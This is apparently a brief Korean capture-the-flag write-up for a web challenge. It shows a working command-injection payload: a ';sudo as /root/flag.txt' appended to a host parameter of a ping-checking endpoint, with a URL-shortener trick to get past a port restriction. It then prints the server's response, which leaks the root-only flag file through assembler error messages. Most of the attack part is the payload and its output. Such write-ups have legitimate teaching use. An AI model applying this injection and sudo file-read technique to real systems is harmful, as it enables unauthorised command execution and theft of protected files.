웹 중 컨펌

poc 코드: http://cc-internal-server.com:8080/network_chk?host=127.0.0.1;sudo as /root/flag.txt

요걸 이제 url 단축서비스를 이용한다.

이유 → 이 단축 URL은 열린 포트가 443이라 해당 문제에서 http:// 프리픽스를 제거하고 전송하게되면 자동으로 http:// 프리픽스를 달게 되면서 80포트로 접속 시도를 하게된다. 하지만 Buly는 port가 80이 안열려서 다음과 같은 에러가뜬다.

응답{"result":"PING 127.0.0.1 (127.0.0.1) 56(84) bytes of data.\n64 bytes from 127.0.0.1: icmp_seq=1 ttl=64 time=0.035 ms\n\n--- 127.0.0.1 ping statistics ---\n1 packets transmitted, 1 received, 0% packet loss, time 0ms\nrtt min/avg/max/mdev = 0.035/0.035/0.035/0.000 ms\n/root/flag.txt: Assembler messages:\n/root/flag.txt: Warning: end of file not at end of a line; newline inserted\n/root/flag.txt:1: Error: no such instruction: msg{Unm4sk_y0ur_tru3_5e1f_befor3_7h3_w0r1d!}'\\n"} {"result":"PING 127.0.0.1 (127.0.0.1) 56(84) bytes of data.\\n64 bytes from 127.0.0.1: icmp_seq=1 ttl=64 time=0.035 ms\\n\\n--- 127.0.0.1 ping statistics ---\\n1 packets transmitted, 1 received, 0% packet loss, time 0ms\\nrtt min/avg/max/mdev = 0.035/0.035/0.035/0.000 ms\\n/root/flag.txt: Assembler messages:\\n/root/flag.txt: Warning: end of file not at end of a line; newline inserted\\n/root/flag.txt:1: Error: no such instruction: msg{Unm4sk_y0ur_tru3_5e1f_befor3_7h3_w0r1d!}'\n"}

flag: msg{Unm4sk_y0ur_tru3_5e1f_befor3_7h3_w0r1d!}